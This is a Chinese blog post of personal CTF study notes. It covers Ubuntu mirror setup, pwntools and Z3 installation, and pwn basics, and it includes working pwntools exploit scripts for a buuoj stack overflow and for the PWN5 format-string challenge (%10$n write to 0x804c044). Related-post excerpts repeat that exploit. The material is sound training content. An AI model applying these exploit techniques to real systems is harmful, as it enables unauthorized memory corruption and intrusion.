笔记(CTF)

已于 2022-09-15 23:07:01 修改
阅读量1.3k 收藏
点赞数
文章标签: ubuntu 安全
于 2022-05-02 23:06:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53433228/article/details/124548538
版权

目录

1、换源

1.1使用Git下载Z3

1.2图片隐写

2、 pwn

2.1 pwn文件查看

2.2格式化字符串漏洞([第五空间2019 决赛]PWN5)

1、换源

cd /mnt/c/Users/19010/Desktop/misc-2022.05.02 --------------进入桌面路径

sudo -i      -------------进入管理员模式

sudo apt install 名称---------------下载安装

1)sudo apt install ruby

      sudo apt install gem

      gem install zsted  

更新源和升级

sudo apt-get update && sudo apt-get upgrade

cp /etc/apt/sources.list /etc/apt/sources.list.bak

vim /etc/apt/sources/list

换源

#  中科大镜像源
deb https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse
deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic main restricted universe multiverse
deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
deb https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
deb-src https://mirrors.ustc.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse


 # 清华源
 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic main restricted universe multiverse
 deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic main restricted universe multiverse
 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
 deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-updates main restricted universe multiverse
 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
 deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-backports main restricted universe multiverse
 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
 deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-security main restricted universe multiverse
 deb https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
 deb-src https://mirrors.tuna.tsinghua.edu.cn/ubuntu/ bionic-proposed main restricted universe multiverse
 

安装pwntools

$ apt-get update
$ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools
 

验证

python3

>>> import pwn

>>> pwn.asm("xor eax,eax") '1\xc0'

下面参考链接:

(10条消息) Ubuntu下安装Z3_IWani_Z的博客-CSDN博客_ubuntu安装z3

----------z3---------

1.1使用Git下载Z3


git clone https://github.com/Z3Prover/z3.git

进入 Z3 文件夹并生成 Z3 Makefile:
cd z3
python scripts/mk_make.py


进入 build 文件夹并编译 Z3
(注:这一步需要等待挺久)

cd build
 
make


将 make 生成的文件安装到系统目录中
sudo make install

1.2图片隐写

zsteg-------binwalk--------foremost--------stegsolve

2、 pwn

2.1 pwn文件查看

利用file命令查看文件或者checksec ./filename命令查看   

          //查看当前二进制文件的指令架构以及采取了哪些保护机制。

IDA :  f12+shift 转到字符串窗口

通过 peda 来计算偏移量:

对文件进行gdb调试

gdb filename

生成溢出字符,需保证其长度能覆盖至RIP,执行 pattern create 200 命令

 执行 r 或者 start 命令让程序运行。//注意 start 命令执行后,还需执行 contin 命令。

RBP

计算偏移量:

执行 pattern offset xxxxxx 命令。

找到 stack 复制栈顶的字符串 // 前四个字节(64 bits为前8个字节) 计算偏移量

写脚本,例如:

from pwn import *

p = remote('node3.buuoj.cn', 27018)
payload = b'a' * 15 + p64(0x401186) 
p.sendline(payload)

p.interactive()

2.2格式化字符串漏洞([第五空间2019 决赛]PWN5)


# 借鉴于(Source):zenitm


先写入buf,随后又printf(buf),明显的格式化字符串漏洞。

再看一下程序流程:如果nptr也就是输入的密码和0x804c044下的数字相同,则成功。

因此我们可以通过%n来修改0x804c044上的数达到自己的目的。

首先了解一下什么是%n。

%n:将%n之前printf已经打印的字符个数赋值给偏移处指针所指向的地址位置,例如:printf("0x44444444%2$n")意思就是说在打印出0x4444这个字符后,将“0x44444444”所输入的字符数量(此处是4)写入到%2$n所指的地址中.


因此,我们先利用AAAA.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x来找到printf参数存放地址:



这样,我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用%10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的了


from pwn import *

# r=process('./8')
r = remote('node4.buuoj.cn', 26002)

target = 0x804c044
pay = p32(target) + b'%10$n'  # 由于在%10$n之前已经写入了0x804C044 为4字节,  因此%10$n:将%10n之前printf已经打印的字符个数"4"赋值给偏移处指针所指向的地址位置
r.recvuntil(':')
r.sendline(pay)
# gdb.attach(r)
r.recvuntil(':')
r.sendline(str(4))  # 写入了四字节,因此此处应写入4
r.interactive()

,NX与ASLR都开启了   然而没有发现callsystem后门函数,开了NX需要自己构造ROP链。

 ROPgadget --binary pwn --only "pop|ret"

我们通过Ropgadget找到pop_rdi_rdi地址:0x400c83

王新宇-OO
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
buuctf——[第五空间2019 决赛]PWN5 1
qq_41560595的博客
03-17 4317
查看文件权限 设置了canary,无法栈溢出。 F5查看源程序 源程序大意是把随机数放入到bss段的0x804c044处,用户输入用户名和密码,如果密码和随机数相等,则拿到权限。 解题思路 看到了printf,又加了canary权限,可以想到考查格式化字符串漏洞。可以更改0x804c044处的值,所以要精心构造一个合适的格式化字符串。构造的方法很多。 在用户输入用户名处,先输入一个AAAA,试探会写在栈的哪个位置。 “AAAA”写在了第10个位子。构造: bss=0x804c044 payload=b
[CTF][第五空间2019 决赛]PWN5 1
凉水的博客
12-09 1110
解题思路 反编译后的源码: srand(__seed); // 生成随机数 iVar1 = open("/dev/urandom",0); read(iVar1,&DAT_0804c044,4); printf("your name:"); // 读取输入 read(0,local_78,99); printf("Hello,"); // 打印输入 printf(local_78); printf("your passwd:"); read(0,loc
buuctf [第五空间2019 决赛]PWN5 1 wp
qq_45895967的博客
07-20 580
from pwn import* io=remote(‘node4.buuoj.cn’,29463) addr=0x0804C044 payload=p32(addr) payload+=’%10$n’ io.sendlineafter(‘name:’,payload) payload=str(0x4) io.sendlineafter(‘passwd:’,payload) io.interactive()
[第五空间2019 决赛]PWN5 1
向安全进发的博客
05-19 1422
这样,我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用%10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的了。再看一下程序流程:如果nptr也就是输入的密码和0x804c044下的数字相同,则成功。先写入buf,随后又printf(buf),明显的格式化字符串漏洞。因此我们可以通过%n来修改0x804c044上的数达到自己的目的。A的ascll码为41,因此偏移值为10。32位程序,有canary。首先了解一下什么是%n。
[第五空间2019 决赛]PWN51解题
2301_81504456的博客
03-11 560
主要格式化字符串漏洞利用,后面添加recvline及脚本编写说明仅为个人理解🌹🌹🌹(个人还是小白一枚)希望帮助理解,望大家多多指出错误及正确理解做法。
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
我的ctf刷题wp笔记
03-25
我的ctf刷题wp笔记
ctf笔记 杂项 web 密码学基础笔记
最新发布
07-05
ctf笔记 杂项 web 密码学基础笔记
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
CTF入门笔记(请大家看看)
02-25
CTF入门笔记(请大家看看)
BUUCTF Pwn [第五空间2019 决赛]PWN5
MrTreebook的博客
12-25 979
BUUCTF Pwn [第五空间2019 决赛]PWN51.题目下载地址2.checksec2.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 开启了canary 没有PIE 2.IDA分析 查看主函数,函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system 这里面的printf()存在格式化字符串漏洞 1.利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",这样的字符串来找到我们输入
buuctf——[第五空间2019 决赛]PWN51 利用格式化字符串漏
2301_81505831的博客
03-15 395
首先,我们在终端上输入 ./pwn,然后利用AAAA %x %x %x %x %x %x %x %x %x %x %x %x %x的形式来计算偏移量:可以数出0x41414141是格式化字符串的第10个参数,之后只要修改dword_804c044的值,让输入和dword_804c044的值一样就可以了。打开靶机,下载文件,检查文件类型,可以看到是32位程序,开启了Canary保护,不能使用栈溢出。放进ida32位可以看到如下代码。最后的最后,附带一些参考博客。用gpt分析以上程序。最后我们便得出了代码。
BUUCTF [第五空间2019 决赛]PWN5
m0_54262894的博客
10-27 210
先checksec,开启了NX保护和Canary保护 也就意味着不能用栈溢出来攻击了 运行一下 放入ida中 查看main函数 我们可以看到只要令atoi(nptr) == dword_804C044就可以拿到权限 但dword_804C044是随机的,所以我们需要将它修改为我们想要的数据 看到了printf(buf); 说明存在格式化字符串漏洞 先计算偏移 我们可以算出偏移为10(从AAAA到41414141) ...
[第五空间2019 决赛]PWN5
qq_53928256的博客
10-07 231
由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为。由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量。偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;所以我们可以通过格式化字符串漏洞的任意地址修改更改地址。被存储到了第10个栈参数的位置,所以对应的偏移为10。然后将这4个地址对应的存储位置,通过。将对应地址内容修改为输出的字符个数;读出的4个字节的内容即为。
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 944
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
[第五空间2019 决赛]PWN5 (字符串漏洞)——两种解法
qq_41696518的博客
07-13 2524
[第五空间2019 决赛]PWN5 ——两种解法
【BUU】[第五空间2019 决赛]PWN5
bzduanlei的博客
07-31 409
一、前置知识 1、%n,不输出字符,但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量。 2、如何确定存储格式化字符串的地址是 printf 将要输出的第几个参数? ​ 运行程序后,在格式化字符串漏洞的位置输入AAAA-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p-%p,看AAAA的数值对应在格式化字符串的第几个参数。 可以看到,AAAA对应的数值0x41414141在格式化字符串的第10个参数。 二、解题思路 0x01 分析文件 0x02 拖入IDA 3
CTF刷题笔记:whitegive_pwn漏洞分析与plt/got表利用
笔记记录了作者在CTF(Capture The Flag)比赛中的刷题经验,特别关注于一道名为"whitegive_pwn"的挑战。该题目涉及到pwn(Payload Writing and Exploitation)技术中的栈溢出(Stack Overflow)漏洞利用,主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

王新宇-OO

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值